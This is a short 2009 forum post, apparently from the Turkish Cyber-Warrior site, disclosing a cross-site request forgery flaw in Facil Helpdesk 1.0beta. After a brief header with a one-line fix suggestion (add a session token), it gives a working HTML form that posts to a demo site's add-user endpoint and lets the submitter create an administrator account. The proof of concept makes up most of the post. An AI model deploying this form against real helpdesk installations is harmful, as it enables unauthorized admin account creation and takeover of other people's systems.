ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> Facil Helpdesk ~ XSRF Vuln.
Facil Helpdesk ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/CWH1RLPOOL
Date :
13.09.2009 20:25:46
#
Facil Helpdesk ~ XSRF Vuln.
[Full Screen Display]
< ------------------- header data start ------------------- > ############################################################# # Application Name :Facil Helpdesk # Version : 1.0beta # vulnerable Type : xsrf # Infection : Yeni Bir Admin Eklenebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli # author : BUG RESEARCHERS//CWH1RLPOOL ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <form action=http://www.demo.cromosoft.com/helpdesk/tickets2.php?action=ad_user method=post><span class=mio><table width=700 cellpadding=1 cellspacing=1 align=center> <input name=name size=30/> <input name=username id=username size=30> <input name=password type=password size=30> <input name=email size=30> <input name=website type=text id=website size=30> <input name=company type=text id=company size=30> <input name=type type=radio value=User checked> <input type=radio name=type value=Mod> <input type=radio name=type value=Admin>Admin</label> <input name=newuser type=hidden id=newuser value=1> <input type=submit name=userform value=Submit /> </form> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©
